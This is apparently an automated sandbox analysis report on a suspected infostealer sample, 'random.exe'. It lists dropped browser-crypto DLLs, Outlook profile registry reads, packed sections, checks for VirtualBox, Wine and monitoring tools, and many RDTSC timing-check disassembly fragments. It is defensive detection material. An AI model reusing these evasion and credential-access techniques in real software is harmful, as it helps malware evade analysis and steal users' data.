Source: C:\Users\user\Desktop\random.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\random.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: random.exe Static file information: File size 1791488 > 1048576
Source: random.exe Static PE information: Raw size of bnnygdcb is bigger than: 0x100000 < 0x19b000
Source: Binary string: mozglue.pdbP source: random.exe, 00000000.00000002.2562518741.000000006C9ED000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: random.exe, 00000000.00000002.2562799015.000000006CBAF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: random.exe, 00000000.00000002.2562799015.000000006CBAF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: random.exe, 00000000.00000002.2562518741.000000006C9ED000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

barindex
Source: C:\Users\user\Desktop\random.exe Unpacked PE file: 0.2.random.exe.7a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bnnygdcb:EW;hhwrhifn:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bnnygdcb:EW;hhwrhifn:EW;.taggant:EW;
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C973480 ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ,GetCurrentProcess,GetProcessTimes,LoadLibraryW,GetProcAddress,__Init_thread_footer,__aulldiv,FreeLibrary,GetSystemTimeAsFileTime, 0_2_6C973480
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: random.exe Static PE information: real checksum: 0x1beef1 should be: 0x1c4657
Source: random.exe Static PE information: section name:
Source: random.exe Static PE information: section name: .idata
Source: random.exe Static PE information: section name:
Source: random.exe Static PE information: section name: bnnygdcb
Source: random.exe Static PE information: section name: hhwrhifn
Source: random.exe Static PE information: section name: .taggant
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9AB536 push ecx; ret 0_2_6C9AB549
Source: random.exe Static PE information: section name: bnnygdcb entropy: 7.954359776641217
Source: C:\Users\user\Desktop\random.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\random.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\random.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\random.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\random.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\random.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\random.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\random.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\random.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\random.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\random.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\random.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\random.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\random.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\random.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\random.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\random.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\random.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file

Boot Survival

barindex
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Jump to behavior
Source: C:\Users\user\Desktop\random.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\random.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\random.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\random.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\random.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\random.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\random.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\random.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\random.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9D55F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_6C9D55F0

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\random.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\random.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 9F00B4 second address: 9EF977 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FBC8CC0CD43h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jno 00007FBC8CC0CD3Eh 0x00000012 nop 0x00000013 add dword ptr [ebp+122D2FB9h], edi 0x00000019 jmp 00007FBC8CC0CD48h 0x0000001e push dword ptr [ebp+122D171Dh] 0x00000024 mov dword ptr [ebp+122D2B7Eh], edi 0x0000002a call dword ptr [ebp+122D27C8h] 0x00000030 pushad 0x00000031 je 00007FBC8CC0CD3Dh 0x00000037 jns 00007FBC8CC0CD37h 0x0000003d xor eax, eax 0x0000003f pushad 0x00000040 push ebx 0x00000041 mov ecx, dword ptr [ebp+122D3659h] 0x00000047 pop edx 0x00000048 mov esi, dword ptr [ebp+122D375Dh] 0x0000004e popad 0x0000004f mov edx, dword ptr [esp+28h] 0x00000053 jmp 00007FBC8CC0CD41h 0x00000058 mov dword ptr [ebp+122D3561h], eax 0x0000005e pushad 0x0000005f mov edi, dword ptr [ebp+122D3709h] 0x00000065 mov dword ptr [ebp+122D2B7Eh], eax 0x0000006b popad 0x0000006c mov esi, 0000003Ch 0x00000071 mov dword ptr [ebp+122D2B7Eh], edx 0x00000077 add esi, dword ptr [esp+24h] 0x0000007b jp 00007FBC8CC0CD37h 0x00000081 lodsw 0x00000083 mov dword ptr [ebp+122D2B7Eh], edx 0x00000089 jmp 00007FBC8CC0CD42h 0x0000008e add eax, dword ptr [esp+24h] 0x00000092 xor dword ptr [ebp+122D2B7Eh], edx 0x00000098 mov ebx, dword ptr [esp+24h] 0x0000009c jmp 00007FBC8CC0CD40h 0x000000a1 nop 0x000000a2 push eax 0x000000a3 push edx 0x000000a4 jmp 00007FBC8CC0CD3Eh 0x000000a9 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 9EF977 second address: 9EF97D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 9EF97D second address: 9EF990 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007FBC8CC0CD3Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 9EF990 second address: 9EF994 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B42DE8 second address: B42DEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B42DEC second address: B42DF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B42DF2 second address: B42DFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FBC8CC0CD36h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B42DFD second address: B42E13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FBC8CB4EEEDh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B5A5D2 second address: B5A5D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B5A5D8 second address: B5A5DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B5A74E second address: B5A76B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007FBC8CC0CD38h 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 js 00007FBC8CC0CD36h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B5A76B second address: B5A78A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FBC8CB4EEE6h 0x00000009 jmp 00007FBC8CB4EEEEh 0x0000000e jnc 00007FBC8CB4EEE6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B5A904 second address: B5A920 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC8CC0CD3Eh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B5A920 second address: B5A937 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jns 00007FBC8CB4EEF2h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B5AAD6 second address: B5AAE9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC8CC0CD3Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B5AC5B second address: B5AC67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B5AC67 second address: B5AC6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B5AC6B second address: B5AC81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007FBC8CB4EEE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f je 00007FBC8CB4EEE6h 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B5AF46 second address: B5AF4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B5AF4A second address: B5AF5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FBC8CB4EEEAh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B5AF5C second address: B5AF6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBC8CC0CD3Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B5AF6A second address: B5AF76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B5AF76 second address: B5AF82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FBC8CC0CD36h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B5D22C second address: B5D2D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC8CB4EEF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d jmp 00007FBC8CB4EEF3h 0x00000012 jmp 00007FBC8CB4EEEDh 0x00000017 popad 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c jmp 00007FBC8CB4EEF7h 0x00000021 pop eax 0x00000022 mov ecx, dword ptr [ebp+122D3859h] 0x00000028 lea ebx, dword ptr [ebp+12440FA5h] 0x0000002e jmp 00007FBC8CB4EEF7h 0x00000033 xchg eax, ebx 0x00000034 jp 00007FBC8CB4EEF4h 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FBC8CB4EEF9h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B5D2D5 second address: B5D2DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B5D356 second address: B5D384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007FBC8CB4EEECh 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FBC8CB4EEF9h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B5D384 second address: B5D3E1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007FBC8CC0CD38h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 or cx, F3B1h 0x00000028 mov edx, dword ptr [ebp+122D3745h] 0x0000002e push 00000000h 0x00000030 sbb si, DE80h 0x00000035 push 537C3E8Ah 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d jmp 00007FBC8CC0CD47h 0x00000042 jng 00007FBC8CC0CD36h 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B5D3E1 second address: B5D3E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B5D3E7 second address: B5D46D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 537C3E0Ah 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007FBC8CC0CD38h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 sbb edi, 5B865603h 0x0000002f push 00000003h 0x00000031 push 00000000h 0x00000033 push eax 0x00000034 call 00007FBC8CC0CD38h 0x00000039 pop eax 0x0000003a mov dword ptr [esp+04h], eax 0x0000003e add dword ptr [esp+04h], 0000001Ah 0x00000046 inc eax 0x00000047 push eax 0x00000048 ret 0x00000049 pop eax 0x0000004a ret 0x0000004b xor ch, FFFFFFDCh 0x0000004e push 00000000h 0x00000050 add dword ptr [ebp+122D268Bh], edi 0x00000056 push ecx 0x00000057 mov cl, F3h 0x00000059 pop edi 0x0000005a push 00000003h 0x0000005c mov cx, BD17h 0x00000060 call 00007FBC8CC0CD39h 0x00000065 push eax 0x00000066 push edx 0x00000067 push eax 0x00000068 push edx 0x00000069 jmp 00007FBC8CC0CD3Ch 0x0000006e rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B5D46D second address: B5D47B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC8CB4EEEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B5D47B second address: B5D513 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBC8CC0CD38h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jnc 00007FBC8CC0CD4Eh 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 jo 00007FBC8CC0CD40h 0x0000001d pushad 0x0000001e js 00007FBC8CC0CD36h 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 mov eax, dword ptr [eax] 0x00000029 jo 00007FBC8CC0CD44h 0x0000002f pushad 0x00000030 jmp 00007FBC8CC0CD3Ah 0x00000035 push edx 0x00000036 pop edx 0x00000037 popad 0x00000038 mov dword ptr [esp+04h], eax 0x0000003c jnp 00007FBC8CC0CD52h 0x00000042 pop eax 0x00000043 mov dword ptr [ebp+122D264Fh], ebx 0x00000049 lea ebx, dword ptr [ebp+12440FAEh] 0x0000004f mov edi, 63F3CDBDh 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 jg 00007FBC8CC0CD38h 0x0000005d push eax 0x0000005e pop eax 0x0000005f rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B5D558 second address: B5D5AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 jmp 00007FBC8CB4EEF7h 0x0000000e push 00000000h 0x00000010 mov dword ptr [ebp+122D27CDh], eax 0x00000016 or esi, 5BB222BEh 0x0000001c call 00007FBC8CB4EEE9h 0x00000021 jmp 00007FBC8CB4EEF2h 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 jp 00007FBC8CB4EEE8h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B5D5AC second address: B5D5CE instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBC8CC0CD41h 0x00000008 jmp 00007FBC8CC0CD3Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jg 00007FBC8CC0CD36h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B5D5CE second address: B5D5DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jp 00007FBC8CB4EEE6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B5D5DD second address: B5D60C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 jo 00007FBC8CC0CD48h 0x0000000e jmp 00007FBC8CC0CD42h 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 js 00007FBC8CC0CD40h 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B5D60C second address: B5D642 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov edi, 762CEE31h 0x0000000b push 00000003h 0x0000000d or si, 9BD1h 0x00000012 push 00000000h 0x00000014 mov dword ptr [ebp+122D300Eh], eax 0x0000001a sub dword ptr [ebp+122D2B7Eh], edi 0x00000020 push 00000003h 0x00000022 add dword ptr [ebp+122D22B1h], eax 0x00000028 call 00007FBC8CB4EEE9h 0x0000002d push esi 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B5D642 second address: B5D664 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FBC8CC0CD45h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B5D664 second address: B5D677 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBC8CB4EEE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B7FB8A second address: B7FB90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B7FB90 second address: B7FBAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FBC8CB4EEF7h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B7FBAE second address: B7FBD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007FBC8CC0CD47h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B7FBD0 second address: B7FBD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B7FBD6 second address: B7FBDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B411EB second address: B41202 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FBC8CB4EEF2h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B41202 second address: B41208 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B41208 second address: B4120C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B4120C second address: B41245 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBC8CC0CD36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d jbe 00007FBC8CC0CD36h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 jc 00007FBC8CC0CD5Dh 0x0000001c push edi 0x0000001d jmp 00007FBC8CC0CD3Ch 0x00000022 pop edi 0x00000023 push eax 0x00000024 push edx 0x00000025 push edi 0x00000026 pop edi 0x00000027 jmp 00007FBC8CC0CD3Bh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B41245 second address: B41249 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B7D8A2 second address: B7D8A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B7D9F7 second address: B7DA01 instructions: 0x00000000 rdtsc 0x00000002 je 00007FBC8CB4EEE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B7DA01 second address: B7DA07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B7DB7D second address: B7DB91 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FBC8CB4EEEEh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B7DB91 second address: B7DB97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
